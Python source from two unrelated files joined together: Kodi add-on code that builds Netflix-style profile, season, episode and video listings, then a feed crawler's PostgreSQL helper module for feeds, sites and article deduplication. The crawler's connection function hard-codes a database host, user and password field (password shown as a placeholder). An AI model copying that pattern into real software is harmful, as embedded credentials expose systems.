'info': {'plot': menu_description}, # The description
'is_folder': True
}
dict_item['menu_items'] = generate_context_menu_mainmenu(menu_id)
directory_items.append(dict_item)
# Save the menu titles so they can be reused when the content of the menus is opened
G.LOCAL_DB.set_value(menu_id, {'title': menu_title}, TABLE_MENU_DATA)
# Add profiles menu
directory_items.append({
'url': common.build_url(['profiles'], mode=G.MODE_DIRECTORY),
'label': common.get_local_string(13200), # "Profiles"
'art': {'icon': 'DefaultUser.png'},
'is_folder': True
})
G.CACHE_MANAGEMENT.execute_pending_db_ops()
return directory_items, {}
def build_profiles_listing(preselect_guid=None, detailed_info=True):
"""Builds the profiles listing"""
directory_items = []
preselect_guid = preselect_guid or G.LOCAL_DB.get_active_profile_guid()
autoselect_guid = G.LOCAL_DB.get_value('autoselect_profile_guid')
library_playback_guid = G.LOCAL_DB.get_value('library_playback_profile_guid')
for guid in G.LOCAL_DB.get_guid_profiles():
directory_items.append(_create_profile_item(guid,
(guid == preselect_guid),
(guid == autoselect_guid),
(guid == library_playback_guid),
detailed_info))
return directory_items, {}
def _create_profile_item(profile_guid, is_selected, is_autoselect, is_library_playback, detailed_info):
profile_name = G.LOCAL_DB.get_profile_config('profileName', '???', guid=profile_guid)
profile_attributes = []
if G.LOCAL_DB.get_profile_config('isPinLocked', False, guid=profile_guid):
profile_attributes.append('[COLOR red]' + common.get_local_string(20068) + '[/COLOR]')
if G.LOCAL_DB.get_profile_config('isAccountOwner', False, guid=profile_guid):
profile_attributes.append(common.get_local_string(30221))
if G.LOCAL_DB.get_profile_config('isKids', False, guid=profile_guid):
profile_attributes.append(common.get_local_string(30222))
if is_autoselect and detailed_info:
profile_attributes.append(common.get_local_string(30054))
if is_library_playback and detailed_info:
profile_attributes.append(common.get_local_string(30051))
attributes_desc = '[CR]'.join(profile_attributes) + '[CR]' if profile_attributes else ''
description = attributes_desc + '[' + G.LOCAL_DB.get_profile_config('language_desc', '', guid=profile_guid) + ']'
if detailed_info:
menu_items = generate_context_menu_profile(profile_guid, is_autoselect, is_library_playback)
else:
menu_items = []
dict_item = {
'label': profile_name,
'properties': {'nf_guid': profile_guid, 'nf_description': description.replace('[CR]', ' - ')},
'art': {'icon': G.LOCAL_DB.get_profile_config('avatar', '', guid=profile_guid)},
'info': {'plot': description}, # The description
'is_selected': is_selected,
'menu_items': menu_items,
'url': common.build_url(pathitems=['home'],
params={'switch_profile_guid': profile_guid},
mode=G.MODE_DIRECTORY),
'is_folder': True
}
return dict_item
@measure_exec_time_decorator(is_immediate=True)
def build_season_listing(season_list, tvshowid, pathitems=None):
"""Build a season listing"""
common_data = {
'supplemental_info_color': get_color_name(G.ADDON.getSettingInt('supplemental_info_color')),
'profile_language_code': G.LOCAL_DB.get_profile_config('language', '')
}
directory_items = [_create_season_item(tvshowid, seasonid_value, season, season_list, common_data)
for seasonid_value, season
in iteritems(season_list.seasons)]
# add_items_previous_next_page uses the updated value of perpetual_range_selector
add_items_previous_next_page(directory_items, pathitems, season_list.perpetual_range_selector, tvshowid)
G.CACHE_MANAGEMENT.execute_pending_db_ops()
return directory_items, {'title': season_list.tvshow['title'] + ' - ' + common.get_local_string(20366)[2:]}
def _create_season_item(tvshowid, seasonid_value, season, season_list, common_data):
seasonid = tvshowid.derive_season(seasonid_value)
dict_item = {
'video_id': seasonid_value,
'media_type': seasonid.mediatype,
'label': season['summary']['name'],
'is_folder': True,
'properties': {'nf_videoid': seasonid.to_string()}
}
add_info_dict_item(dict_item, seasonid, season, season_list.data, False, common_data)
dict_item['url'] = common.build_url(videoid=seasonid, mode=G.MODE_DIRECTORY)
dict_item['menu_items'] = generate_context_menu_items(seasonid, False, None)
return dict_item
@measure_exec_time_decorator(is_immediate=True)
def build_episode_listing(episodes_list, seasonid, pathitems=None):
"""Build a episodes listing of a season"""
common_data = {
'params': get_param_watched_status_by_profile(),
'set_watched_status': G.ADDON.getSettingBool('ProgressManager_enabled'),
'supplemental_info_color': get_color_name(G.ADDON.getSettingInt('supplemental_info_color')),
'profile_language_code': G.LOCAL_DB.get_profile_config('language', ''),
'active_profile_guid': G.LOCAL_DB.get_active_profile_guid()
}
directory_items = [_create_episode_item(seasonid, episodeid_value, episode, episodes_list, common_data)
for episodeid_value, episode
in iteritems(episodes_list.episodes)]
# add_items_previous_next_page uses the updated value of perpetual_range_selector
add_items_previous_next_page(directory_items, pathitems, episodes_list.perpetual_range_selector)
G.CACHE_MANAGEMENT.execute_pending_db_ops()
return directory_items, {'title': episodes_list.tvshow['title'] + ' - ' + episodes_list.season['summary']['name']}
def _create_episode_item(seasonid, episodeid_value, episode, episodes_list, common_data):
is_playable = episode['summary']['isPlayable']
episodeid = seasonid.derive_episode(episodeid_value)
dict_item = {'video_id': episodeid_value,
'media_type': episodeid.mediatype if is_playable else None,
'label': episode['title'],
'is_folder': False,
'properties': {'nf_videoid': episodeid.to_string()}}
add_info_dict_item(dict_item, episodeid, episode, episodes_list.data, False, common_data)
set_watched_status(dict_item, episode, common_data)
if is_playable:
dict_item['url'] = common.build_url(videoid=episodeid, mode=G.MODE_PLAY, params=common_data['params'])
dict_item['menu_items'] = generate_context_menu_items(episodeid, False, None)
else:
# The video is not playable; check whether an availability date/message exists
dict_item['properties']['nf_availability_message'] = get_availability_message(episode)
dict_item['url'] = common.build_url(['show_availability_message'], mode=G.MODE_ACTION)
return dict_item
@measure_exec_time_decorator(is_immediate=True)
def build_loco_listing(loco_list, menu_data, force_use_videolist_id=False, exclude_loco_known=False):
"""Build a listing of video lists (LoCo)"""
# If contexts are specified (loco_contexts in the menu_data), then the loco_list data will be filtered by
# the specified contexts, otherwise all LoCo items will be added
common_data = {
'menu_data': menu_data,
'supplemental_info_color': get_color_name(G.ADDON.getSettingInt('supplemental_info_color')),
'profile_language_code': G.LOCAL_DB.get_profile_config('language', '')
}
contexts = menu_data.get('loco_contexts')
items_list = loco_list.lists_by_context(contexts) if contexts else iteritems(loco_list.lists)
directory_items = []
for video_list_id, video_list in items_list:
menu_parameters = common.MenuIdParameters(video_list_id)
if not menu_parameters.is_menu_id:
continue
list_id = (menu_parameters.context_id
if menu_parameters.context_id and not force_use_videolist_id
else video_list_id)
# Keep only some types of menus: 28=genre, 101=top 10
if exclude_loco_known:
if menu_parameters.type_id not in ['28', '101']:
continue
if menu_parameters.type_id == '101':
# Top 10 list can be obtained only with 'video_list' query
force_use_videolist_id = True
# Create dynamic sub-menu info in MAIN_MENU_ITEMS
sub_menu_data = menu_data.copy()
sub_menu_data['path'] = [menu_data['path'][0], list_id, list_id]
sub_menu_data['loco_known'] = False
sub_menu_data['loco_contexts'] = None
sub_menu_data['content_type'] = menu_data.get('content_type', G.CONTENT_SHOW)
sub_menu_data['force_use_videolist_id'] = force_use_videolist_id
sub_menu_data['title'] = video_list['displayName']
sub_menu_data['initial_menu_id'] = menu_data.get('initial_menu_id', menu_data['path'][1])
sub_menu_data['no_use_cache'] = menu_parameters.type_id == '101'
G.LOCAL_DB.set_value(list_id, sub_menu_data, TABLE_MENU_DATA)
directory_items.append(_create_videolist_item(list_id, video_list, sub_menu_data, common_data))
G.CACHE_MANAGEMENT.execute_pending_db_ops()
return directory_items, {}
def _create_videolist_item(list_id, video_list, menu_data, common_data, static_lists=False):
if static_lists and G.is_known_menu_context(video_list['context']):
pathitems = list(menu_data['path']) # Make a copy
pathitems.append(video_list['context'])
else:
# It is a dynamic video list / menu context
if menu_data.get('force_use_videolist_id', False):
path = 'video_list'
else:
path = 'video_list_sorted'
pathitems = [path, menu_data['path'][1], list_id]
dict_item = {'label': video_list['displayName'],
'is_folder': True}
add_info_dict_item(dict_item, video_list.videoid, video_list, video_list.data, False, common_data,
art_item=video_list.artitem)
# Add possibility to browse the sub-genres (see build_video_listing)
sub_genre_id = video_list.get('genreId')
params = {'sub_genre_id': unicode(sub_genre_id)} if sub_genre_id else None
dict_item['url'] = common.build_url(pathitems,
params=params,
mode=G.MODE_DIRECTORY)
return dict_item
@measure_exec_time_decorator(is_immediate=True)
def build_video_listing(video_list, menu_data, sub_genre_id=None, pathitems=None, perpetual_range_start=None,
mylist_items=None):
"""Build a video listing"""
common_data = {
'params': get_param_watched_status_by_profile(),
'mylist_items': mylist_items,
'set_watched_status': G.ADDON.getSettingBool('ProgressManager_enabled'),
'supplemental_info_color': get_color_name(G.ADDON.getSettingInt('supplemental_info_color')),
'mylist_titles_color': (get_color_name(G.ADDON.getSettingInt('mylist_titles_color'))
if menu_data['path'][1] != 'myList'
else None),
'profile_language_code': G.LOCAL_DB.get_profile_config('language', ''),
'ctxmenu_remove_watched_status': menu_data['path'][1] == 'continueWatching',
'active_profile_guid': G.LOCAL_DB.get_active_profile_guid()
}
directory_items = [_create_video_item(videoid_value, video, video_list, perpetual_range_start, common_data)
for videoid_value, video
in iteritems(video_list.videos)]
# If a sub-genre id exists, add the possibility to browse the LoCo sub-genres
if sub_genre_id and sub_genre_id != 'None':
# Create dynamic sub-menu info in MAIN_MENU_ITEMS
menu_id = 'subgenre_' + sub_genre_id
sub_menu_data = menu_data.copy()
sub_menu_data['path'] = [menu_data['path'][0], menu_id, sub_genre_id]
sub_menu_data['loco_known'] = False
sub_menu_data['loco_contexts'] = None
sub_menu_data['content_type'] = menu_data.get('content_type', G.CONTENT_SHOW)
sub_menu_data.update({'title': common.get_local_string(30089)})
sub_menu_data['initial_menu_id'] = menu_data.get('initial_menu_id', menu_data['path'][1])
G.LOCAL_DB.set_value(menu_id, sub_menu_data, TABLE_MENU_DATA)
# Create the folder entry that gives access to the sub-genres
folder_dict_item = {
'url': common.build_url(['genres', menu_id, sub_genre_id], mode=G.MODE_DIRECTORY),
'label': common.get_local_string(30089),
'art': {'icon': 'DefaultVideoPlaylists.png'},
'info': {'plot': common.get_local_string(30088)}, # The description
'is_folder': True
}
directory_items.insert(0, folder_dict_item)
# add_items_previous_next_page uses the new value of perpetual_range_selector
add_items_previous_next_page(directory_items, pathitems, video_list.perpetual_range_selector, sub_genre_id)
G.CACHE_MANAGEMENT.execute_pending_db_ops()
return directory_items, {}
def _create_video_item(videoid_value, video, video_list, perpetual_range_start, common_data):
is_playable = video['availability']['isPlayable']
videoid = common.VideoId.from_videolist_item(video)
is_folder = videoid.mediatype == common.VideoId.SHOW
is_in_mylist = videoid in common_data['mylist_items']
dict_item = {'video_id': videoid_value,
'media_type': videoid.mediatype if is_playable else None,
'label': video['title'],
'is_folder': is_folder,
'properties': {'nf_videoid': videoid.to_string(),
'nf_is_in_mylist': str(is_in_mylist),
'nf_perpetual_range_start': perpetual_range_start}}
add_info_dict_item(dict_item, videoid, video, video_list.data, is_in_mylist, common_data)
set_watched_status(dict_item, video, common_data)
if is_playable:
dict_item['url'] = common.build_url(videoid=videoid,
mode=G.MODE_DIRECTORY if is_folder else G.MODE_PLAY,
params=None if is_folder else common_data['params'])
dict_item['menu_items'] = generate_context_menu_items(videoid, is_in_mylist, perpetual_range_start,
common_data['ctxmenu_remove_watched_status'])
else:
# The video is not playable; check whether an availability date/message exists
dict_item['properties']['nf_availability_message'] = get_availability_message(video)
dict_item['url'] = common.build_url(['show_availability_message'], mode=G.MODE_ACTION)
return dict_item
@measure_exec_time_decorator(is_immediate=True)
def build_subgenres_listing(subgenre_list, menu_data):
"""Build a listing of sub-genres list"""
directory_items = []
for index, subgenre_data in subgenre_list.lists: # pylint: disable=unused-variable
# Create dynamic sub-menu info in MAIN_MENU_ITEMS
sel_video_list_id = unicode(subgenre_data['id'])
sub_menu_data = menu_data.copy()
sub_menu_data['path'] = [menu_data['path'][0], sel_video_list_id, sel_video_list_id]
sub_menu_data['loco_known'] = False
sub_menu_data['loco_contexts'] = None
sub_menu_data['content_type'] = menu_data.get('content_type', G.CONTENT_SHOW)
sub_menu_data['title'] = subgenre_data['name']
sub_menu_data['initial_menu_id'] = menu_data.get('initial_menu_id', menu_data['path'][1])
G.LOCAL_DB.set_value(sel_video_list_id, sub_menu_data, TABLE_MENU_DATA)
directory_items.append(_create_subgenre_item(sel_video_list_id,
subgenre_data,
sub_menu_data))
return directory_items, {}
def _create_subgenre_item(video_list_id, subgenre_data, menu_data):
pathitems = ['video_list_sorted', menu_data['path'][1], video_list_id]
dict_item = {
'url': common.build_url(pathitems, mode=G.MODE_DIRECTORY),
'is_folder': True,
'label': subgenre_data['name']
}
return dict_item
|
|
#
# feed sucker common functions
#
import re
import psycopg2
import psycopg2.extras
import psycopg2.extensions
import random
import urlparse
import pdb
#from BeautifulSoup import BeautifulSoup, Tag, NavigableString
import urllib
import urlparse
import datetime, pytz
import traceback
import util
import iso_map
#crashes: from article_extractor import dechrome
#crashes: import lxml, lxml.html, lxml.html.clean, lxml.html.soupparser
#does not crash: import BeautifulSoup
#stalls: import lxml
import urllib,urllib2,socket,urlparse
################ database ###############
prepared = []
def extract_hostname(URL):
#m = re.compile('[^:]*://([^/#\?]*)[/#\?]*.*').match(URL)
#if m: return m.group(1)
sp = urlparse.urlsplit(URL)
assert sp.scheme.lower() in ['http', 'https']
#assert ' ' not in URL # apparently it works even when there is a space in it .. or does urllib escape it?
assert ' ' not in sp.netloc
assert len(sp.netloc) >= 5
return sp.netloc
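# e.g. extract_hostname('http://www.example.com/rss/all.xml') -> 'www.example.com'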
def mk_timestamp(t):
if not t: return '1000-01-01 00:00:01'
else: return str(t.tm_year) + "-" + str(t.tm_mon) + "-" + str(t.tm_mday) + " " + str(t.tm_hour) + ":" + str(t.tm_min) + ":" + str(t.tm_sec)
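# e.g. mk_timestamp(time.gmtime(0)) -> '1970-1-1 0:0:0'; falsy input maps to the sentinel '1000-01-01 00:00:01'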
###
def DB_connect(appname=None):
db = psycopg2.extras.DictConnection("host=maximus.ijs.si dbname=news user=news password=XXX_GITHUB_XXX")
psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY)
c = db.cursor()
c.execute("SET bytea_output TO 'escape'") # za psycopg2 < 2.4
if appname:
c.execute("SET application_name TO %s", (appname,))
# c.execute('SET DATESTYLE TO \'ISO\'')
db.commit()
return db
def DB_exec(db, cmd):
c = db.cursor()
c.execute(cmd)
c.close()
db.commit()
def DBod(curs):
r = curs.fetchone()
if r:
return dict(r)
else: return None
def DB_prepare(db, clin):
c = db.cursor()
for classes, name, types, command in prepared:
if len(classes & clin) > 0:
c.execute("PREPARE %s (%s) AS %s" % (name, ','.join(types), command))
c.close()
db.commit()
## feed sucker
# TODO: a check should be added here that the site must not be locked, etc. ...
SQL_FIND_FEEDS = "SELECT * FROM feed WHERE NOT disabled AND next_scan < NOW() ORDER BY next_scan ASC LIMIT 1"
SQL_FIND_NEXT = "SELECT (next_scan-NOW())::reltime::int AS next FROM feed WHERE NOT disabled ORDER BY next_scan ASC LIMIT 1"
def DB_get_next_random_feed(db):
#print "get next random feed"
c = db.cursor()
c.execute(SQL_FIND_FEEDS) # lock for update
r = DBod(c)
return r
def DB_release_feed(db, f):
pass
def DB_get_next_feed_timestamp(db):
#print "get timeout"
c = db.cursor()
c.execute(SQL_FIND_NEXT)
r = DBod(c)
return r
def DB_log_feed_suck(db, feed_id, feed_site_id, http_code, note=None, n_e=None, n_i=None, unchanged=None):
#print "logging feed=%d code=%d note=%s" % (feed_id, http_code, note)
c = db.cursor()
c.execute("INSERT INTO feed_suck_log (feedid, feedsiteid, HTTP_code, note, n_e, n_i, unchanged) VALUES (%s, %s, %s, %s, %s, %s, %s)", (feed_id, feed_site_id, http_code, note, n_e, n_i, unchanged))
db.commit()
def DB_disable_feed(db, id, now=False, flag=3):
if now:
print "db> Disabling feed %d with flag %d" % (id,flag)
c = db.cursor()
c.execute("UPDATE feed SET disabled=true, flag=%s, last_scan=now() WHERE id=%s", (flag,id,))
db.commit()
else:
print "db> Conditionally disabling feed %d with flag 11" % id
c = db.cursor()
c.execute("UPDATE feed SET failures=failures+1, disabled = disabled OR (failures>4), flag=11 WHERE id=%s", (id,))
db.commit()
def try_slice(l, n):
try:
return l[:n]
except:
return None
def DB_update_feed(db, feed, suck, last_ts):
#print "db> Updating feed %d and feed info" % feed['id']
c = db.cursor()
etag=title=description=language=copyright=pub_date=ttl=None
if 'etag' in suck: etag=suck.etag
if 'title' in suck.feed: title=try_slice(suck.feed.title,1000)
if 'description' in suck.feed: description=try_slice(suck.feed.description,10000)
if 'language' in suck.feed:
language = (suck.feed.language or '').split('-')[0]
if language not in iso_map.iso3to2:
language = iso_map.iso2to3.get(language, None)
if 'copyright' in suck.feed: copyright=try_slice(suck.feed.copyright,100000)
if 'updated_parsed' in suck.feed: pub_date=suck.feed.updated_parsed
if 'ttl' in suck.feed: ttl=suck.feed.ttl
c.execute("UPDATE feed SET last_etag=%s, failures=0, pruning_ts_last=%s WHERE id=%s", (psycopg2.Binary(etag) if etag else None, last_ts, feed['id']))
# !bn: this really does not need to be flushed to the database on every feed update .. replace with a stored procedure? -- it only updates once per 7 days anyway; the select runs every time though..
c.execute("UPDATE feed_ps SET title=%s, description=%s, language=%s, copyright=%s, pub_date=%s, published_ttl=%s, updated=now() WHERE feedid = %s AND updated < (now() - (7*86400)::reltime)", (title, description, language, copyright, mk_timestamp(pub_date), ttl, feed['id']))
db.commit()
def DB_update_feed_scan(db, feed):
#print "db> Updating feed next_scan"
c = db.cursor()
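# the next scan is scheduled with +/-50% jitter around the feed's effective TTL to spread the load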
c.execute("UPDATE feed SET last_scan=NOW(), next_scan = (NOW() + (%s*(0.5+random()))::int::reltime) WHERE id = %s", (feed['effective_ttl'], feed['id']))
db.commit()
# !bn: hoping these two functions [the one above, the one below] are never called concurrently?
def DB_update_feed_stat(db, feed, n_e, n_i):
if n_i == 0: unchanged = feed['unchanged_iter'] + 1
else: unchanged = 0
if n_e == 0: overlap = 1
else: overlap = (n_i+0.0) / float(n_e)
#print "db> Updating feed stat to %d %f" % (unchanged, overlap)
c = db.cursor()
c.execute("UPDATE feed SET unchanged_iter=%s, last_overlap=%s, found_total=found_total+%s, found_new=found_new+%s WHERE id=%s", (unchanged, overlap, n_e, n_i, feed['id']))
db.commit()
###
def DB_find_site(db, hostname):
c=db.cursor()
c.execute("SELECT * FROM site WHERE hostname = %s LIMIT 1", (hostname,))
r = DBod(c)
return r
# !! perf: select on an unindexed URL column
def DB_find_feed(db, URL):
c=db.cursor()
c.execute("SELECT * FROM feed WHERE URL = %s LIMIT 1", (URL,))
r = DBod(c)
return r
# !bn: stored-procedure candidate
def DB_find_insert_site(db, hostname, feed_site=False, news_site=False):
assert hostname, "Won't insert NULL into site(hostname). fail."
site = DB_find_site(db, hostname)
if not site:
c = db.cursor()
c.execute("INSERT INTO site (hostname, is_a_feed_site, is_a_news_site) VALUES (%s,%s,%s)", (hostname,feed_site,news_site))
db.commit()
return DB_find_site(db, hostname)
else:
if (not site['is_a_feed_site'] and feed_site) or (not site['is_a_news_site'] and news_site):
c = db.cursor()
c.execute("UPDATE site SET is_a_feed_site=%s, is_a_news_site=%s WHERE id=%s",
(feed_site or site['is_a_feed_site'], news_site or site['is_a_news_site'], site['id']))
db.commit()
return DB_find_site(db, hostname)
return site
def DB_find_insert_feed(db, URL, regex='(.*)', disabled=False, trust_level=2, ftype=None):
feed = DB_find_feed(db, URL)
if feed:
return feed
else:
hostname = extract_hostname(URL)
try:
site = DB_find_insert_site(db, hostname, feed_site=True)
except:
raise
sid = site['id']
c = db.cursor()
c.execute("INSERT INTO feed (siteid, URL, regex, disabled, trust_level, type) VALUES (%s,%s,%s,%s,%s,%s) RETURNING id", (sid, URL, regex, disabled, trust_level, ftype))
fid = c.fetchone()[0]
c.execute("INSERT INTO feed_ps (feedid, feedsiteid) VALUES (%s, %s)", (fid, sid))
db.commit()
return DB_find_feed(db,URL)
def conv_time(t, default=None): # assume utc input for now ; !bn: check|fix!
try:
return datetime.datetime(*t.updated_parsed[:6], tzinfo=pytz.UTC) if ('updated_parsed' in t and t.updated_parsed) else default
except:
return default
# input: feedparsers result
def post_entry(db, feed, entry, acl=None, cutoff_ts = None):
global title
try:
pubdate = conv_time(entry, None)
if cutoff_ts:
if pubdate == None:
raise Exception("uberfail!")
elif pubdate < cutoff_ts: # strictly lt !
return (0,0,0,0,1)
if not 'link' in entry or not entry.link:
print "[%8d] --- faulty link" % (feed['id'],)
return (1,0,0,0,0)
grs = [x for x in entry.keys() if x.startswith('gml_') or x.startswith('georss_')]
title = util.textifyHtml(entry.title).replace('\n',' ') if 'title' in entry else None
# title = (dechrome.parseTitleFromCleartext([title], entry.link) or None) if title else None
gml = entry.georss_point if ('georss_point' in entry and entry.georss_point) else None
tags = [x['term'] for x in entry.tags] if 'tags' in entry else None
# explicitly linked images
img_links = [link.href for link in getattr(entry,'links',{}) if getattr(link,'type','').startswith('image/') and link.get('href','').strip()]
img = img_links[0] if img_links else None
# images embedded in the summary html
if not img:
img_links = re.findall('<img[^>]* src="([^"]+)"', getattr(entry,'summary',''))
img = img_links[0] if len(img_links) == 1 else None
## fugly hack
#if grs and len(grs) > 0: fff.write('%s\n' % str(grs))
#if tags and len(tags) > 0: fff.write('%s\n' % str(tags))
#if gml: fff.write('gml=%s\n' % str(gml))
#fff.flush()
return DB_insert_and_enqueue_article(db, feed, entry.link, pubdate=pubdate, title=title, gml=gml, tags=tags, img=img, acl=acl) + (0,)
except:
print traceback.format_exc()
return (1,0,0,0,0)
prepared.append(({'feedsuck'}, 'check_article', ('text',), "SELECT fa_feed_id AS feedid, fa_id AS id FROM feed_article_urls WHERE url_hash(url) = url_hash($1) AND url=$1"))
#prepared.append(({'feedsuck'}, 'check_article', ('text',), "SELECT feedid, id FROM feed_article WHERE (url_hash(url) = url_hash($1) AND url=$1) or (url_hash(final_url) = url_hash($1) AND final_url=$1)"))
prepared.append(({'feedsuck'}, 'check_article6', ('text',),"""
SELECT fa_feed_id AS feedid, fa_id AS id
FROM feed_article_urls
WHERE
month_id(ts) IN (month_id(now()), month_id(now())-1, month_id(now())-2)
AND
url_hash6(url) = url_hash6($1)
"""))
# !bn: for consideration: the URL is not checked explicitly because it is a 48-bit hash .. and if there is a collision within 3 months .. tough luck.
#prepared.append(({'feedsuck'}, 'check_article6', ('text',),"""
#SELECT feedid, id FROM feed_article
#WHERE
# (
# (month_id(found) in (month_id(now()), month_id(now())-1, month_id(now())-2))
# and (
# (
# url_hash6(url) = url_hash6($1)
#-- AND url=$1
# )
# or
# (
# url_hash6(final_url) = url_hash6($1)
#-- AND final_url=$1
# )
# )
# )
#"""))
# both queries could be merged with an OR (check6 conditions or check_article conditions) plus LIMIT 1; but for now(?) the optimizer does not notice that it can short-circuit the second set of conditions once check6 already yields a hit
# do not check the URL string match in check6 ... otherwise we have gained nothing .. 90% of the lookups are positive, and for those the db would have to go look into the f_a table...
# ^ reasoning fail: the db does a bitmap heap scan recheck condition even if we do not compare the URL. maybe it just will not load the URL from TOAST, so we get a 2x speedup?
# and if 2 URLs within 3e6 seconds (34d17h) collide on the 48-bit hash ... tough luck for them.
# sample: [--STAT--] c6: 15220, c4: 4171, f:808
#         [--STAT--] c6: 3209916, c4: 849209, f:95274
# before the feed_article changes
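# Hedged sketch only (not registered): roughly what the merged single prepared
# statement described in the comment above might look like, assuming the same
# feed_article_urls schema and the url_hash/url_hash6/month_id helpers used above
# (the 'check_article_merged' name is made up here for illustration).
#prepared.append(({'feedsuck'}, 'check_article_merged', ('text',), """
#SELECT fa_feed_id AS feedid, fa_id AS id
#FROM feed_article_urls
#WHERE
#  (month_id(ts) IN (month_id(now()), month_id(now())-1, month_id(now())-2)
#   AND url_hash6(url) = url_hash6($1))
#  OR (url_hash(url) = url_hash($1) AND url = $1)
#LIMIT 1
#"""))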
d_ca_stat = {'c6': 0, 'c4': 0, 'f':0}
d_ca_n = 0
def DB_check_article(db, URL):
global d_ca_stat, d_ca_n
d_ca_n = d_ca_n + 1
if d_ca_n % 200 == 0: print '[--STAT--] c6: %d, c4: %d, f:%d' % (d_ca_stat['c6'], d_ca_stat['c4'], d_ca_stat['f'])
c = db.cursor()
c.execute("EXECUTE check_article6(%s)", (URL,)) # try last 2 months and 6B hash first
if c.rowcount > 0: # found a hit already, don't continue
d_ca_stat['c6'] += 1
return DBod(c)
else:
c.execute("EXECUTE check_article(%s)", (URL,)) # if no match, try the entire database
if c.rowcount > 0: d_ca_stat['c4'] += 1
else: d_ca_stat['f'] += 1
return DBod(c)
## article insert
def check_feed_auth(url, trust_level):
if not url: return False
scheme = url[0:4].lower()
if not scheme == 'http': return False
suffix = url[-4:]
if suffix == '.mp3': return False
if trust_level == 1:
return True
elif trust_level == 2:
return True
elif trust_level >= 3:
return False
else:
return True
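# e.g. check_feed_auth('http://example.com/rss.xml', 2) -> True
#      check_feed_auth('http://example.com/episode.mp3', 1) -> False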
###
def DB_note_overlap(db, lf, rf):
c = db.cursor()
c.execute("SELECT * FROM feed_overlap where lfeed=%s AND rfeed=%s", (lf, rf))
if c.rowcount == 0:
c.execute('INSERT INTO feed_overlap (lfeed, rfeed) VALUES (%s, %s)', (lf,rf))
else:
c.execute('UPDATE feed_overlap SET count = count + 1 WHERE lfeed=%s AND rfeed=%s', (lf,rf))
db.commit()
# !bn: a serious candidate for a stored procedure
def DB_find_insert_article(db, feed, URLm, title=None, pubdate=None, gml=None, tags=None, img=None, acl=None, enqueue=True, provider_site=None):
feed_id = feed['id']
feed_site_id = feed['siteid']
rx = feed['regex']
rdecode = feed['parse_unquote']
#print "feed:%d, regex: %s" % (feed_id, rx)
URL = URLm
try:
URL = re.compile(rx).match(URLm).group(1)
except:
# !bn: a bit best-effort -- if it does not work out, it just does not ...
pass
#print "inserting real url: %s" % URL
if rdecode: URL = urllib.unquote(URL)
if len(URL) > 4095:
db.commit()
return (1,0,0,0) # fail
art=DB_check_article(db, URL)
if art:
lf = art['feedid']
rf = feed['id']
if lf == rf: return (0,1,0,0) # same feed
if lf > rf: lf,rf = rf,lf
DB_note_overlap(db, lf, rf)
db.commit()
return (0,0,1,0) # other feed
try:
# !bn: yet another database lookup
hostname = extract_hostname(URL)
site = DB_find_insert_site(db, hostname)
except:
db.rollback()
print URLm, " is fucked url."
return (1,0,0,0)
c = db.cursor()
c.execute("INSERT INTO feed_article (siteid, feedsiteid, feedid, enqueued, acl_tagset, publisher_siteid) VALUES (%s,%s,%s,%s,%s,%s) RETURNING id", (site['id'], feed_site_id, feed_id, enqueue, acl, provider_site))
artid = c.fetchone()[0]
c.execute("INSERT INTO feed_article_urls (fa_id, fa_feed_id, url) VALUES (%s, %s, %s)", (artid, feed_id, URL))
c.execute("INSERT INTO feed_article_meta (id, title, pub_date, tags, geo, img) VALUES (%s, %s, %s, %s, %s, %s)", (artid, title, pubdate, tags, gml, img))
#print URL, c.query
db.commit()
return (0,0,0,1) # added
def DB_insert_and_enqueue_article(db, feed, URL, title=None, pubdate=None, gml=None, tags=None, img=None, acl=None):
if not check_feed_auth(URL, feed['trust_level']): raise Exception("Wrong trust level.")
return DB_find_insert_article(db, feed, URL, title=title, pubdate=pubdate, gml=gml, tags=tags, img=img, acl=acl)
#!bn: TODO: what if we insert two articles that have the same final_url? (or one 'final' and the other 'one-and-only') .. for now this does not bother anyone. fail!
def DB_post_article(db, art_id, art_feedid, art_feedsiteid, art_siteid, url, final_url, max_fau_seq, code, header, content, mode = None):
assert mode==None
c = db.cursor()
# check for collisions.
# final_url in f_a_u.url where not f_a_u.fa_id != art_id
# if match, merge, otherwise, insert
try:
c.execute("INSERT INTO article (feed_articlefeedid, feed_articlefeedsiteid, feed_articlesiteid, feed_articleid, HTTP_code, header, content) VALUES (%s,%s,%s,%s,%s,%s,%s)",
(art_feedid, art_feedsiteid, art_siteid, art_id,
code, header.decode('ascii', 'replace'), psycopg2.Binary(content)))
except:
# tried to insert an already existing article and got IntegrityError: key exists
db.rollback()
DB_log(db, art_siteid, url, 902, -1)
return
# c.execute("UPDATE feed_article SET final_url=%s, enqueued=false WHERE id=%s", (final_url, art_id)) # !bn: merge: update statistike, itn.
c.execute("UPDATE feed_article SET enqueued=false WHERE id=%s", (art_id,)) # !bn: merge: update statistike, itn.
if final_url is not None and not final_url == url:
c.execute("INSERT INTO feed_article_urls (seq, fa_id, fa_feed_id, url) VALUES (%s, %s, %s, %s)", (max_fau_seq+1, art_id, art_feedid, final_url))
db.commit()
c.execute("UPDATE feed_article_meta SET is_http_error=%s WHERE id = %s", (int(code) >= 400, art_id))
if c.rowcount == 0:
print "db> could not update feed_article_meta, trying insert."
db.rollback()
c.execute("INSERT INTO feed_article_meta (id, is_http_error) VALUES (%s, %s)", (art_id, int(code) >= 400))
if int(code) < 400: c.execute("SELECT nextval('articles_downloaded')")
db.commit()
def DB_post_cleaned(db, art_id, art_feedid, art_feedsiteid, art_siteid, cleaned):
c = db.cursor()
# c.execute("INSERT INTO article (feed_articlefeedid, feed_articlefeedsiteid, feed_articlesiteid, feed_articleid, HTTP_code, header, content) VALUES (%s,%s,%s,%s,%s,%s,%s)",
# (art_feedid, art_feedsiteid, art_siteid, art_id,
# code, header.decode('ascii', 'replace'), psycopg2.Binary(content)))
# c.execute("UPDATE feed_article SET final_url=%s, enqueued=false, locked=false WHERE id=%s", (final_url, art_id))
c.execute("INSERT INTO processed_article (feed_articleid, mode, content) VALUES (%s,%s,%s)", (art_id, "cleartext", cleaned))
db.commit()
def DB_unlock_cleaning(db, artid):
return # just don't.
c = db.cursor()
c.execute("UPDATE feed_article_meta SET locked=false WHERE id = %s", (artid,))
db.commit()
def DB_retry_article(db, fa_id):
c = db.cursor()
c.execute("UPDATE feed_article SET last_attempt=NOW(), next_attempt=NOW()+1200::reltime WHERE id=%s", (fa_id,))
db.commit()
###
def DB_site_access_unlock(db, site_id):
c = db.cursor()
c.execute("UPDATE site SET last_request=NOW(), next_request=NOW()+request_interval, locked=false WHERE id = %s", (site_id,))
db.commit()
